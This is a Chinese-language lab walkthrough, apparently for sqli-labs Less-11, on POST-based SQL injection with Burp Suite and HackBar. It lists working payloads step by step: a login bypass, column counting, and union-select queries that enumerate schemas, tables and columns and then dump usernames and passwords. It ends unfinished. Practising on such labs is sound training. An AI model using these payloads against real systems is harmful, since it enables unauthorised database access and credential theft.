Less-11 post传递
Less-11至less-20为post传递,post注入是通过对输入框进行传参,可以被带入数据库进行的查询
注入的两个条件:
1.用户可以控制传参,2.用户输入的语句被带入数据库进行查询
首先我们用burp-suite进行抓包,配合hackbar进行注入
抓包,配置好burp-suite代理,
这里可以看到post传参的过程,将其复制,使用harkbar中的post data,开始注入
**
判断注入点
**
uname=’ or 1=1# &passwd=&submit=Submit 登录成功,判断这里为单引号闭合
(–+注释在URL中适用,在post传递中我们采用#进行注释)
判断字段个数,用于后面确定显示位:
uname=’ order by 3# &passwd=&submit=Submit 返回错误:
uname=’ order by 2# &passwd=&submit=Submit 无回显,确定字段为2
得到显示位:
uname=’ union select 1,2# &passwd=&submit=Submit
**
使用union联合查询当前数据库:
**
uname=’ union select 1,database()# &passwd=&submit=Submit
查询所有数据库(使用group_concat)
uname=’ union select 1,(select group_concat(schema_name) from information_schema.schemata )# &passwd=&submit=Submit
查询security库中的表:
uname=’ union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=‘security’ )# &passwd=&submit=Submit
查询users表中的字段:
uname=’ union select 1,(select group_concat(column_name) from information_schema.columns where table_schema=‘security’ and table_name=‘users’)# &passwd=&submit=Submit
查询users表中username字段的信息:
uname=’ union select 1,(select group_concat(username) from security.users)#&passwd=&submit=Submit
查询password字段的信息:
uname=’ union select 1,(select group_concat(password) from security.users)#&passwd=&submit=Submit
将username和password连接后再输出:
uname=’ union select 1,(select group_concat(concat_ws(’-’,username,password)) from security.users)#&passwd=&submit=Submit
未完待续。。。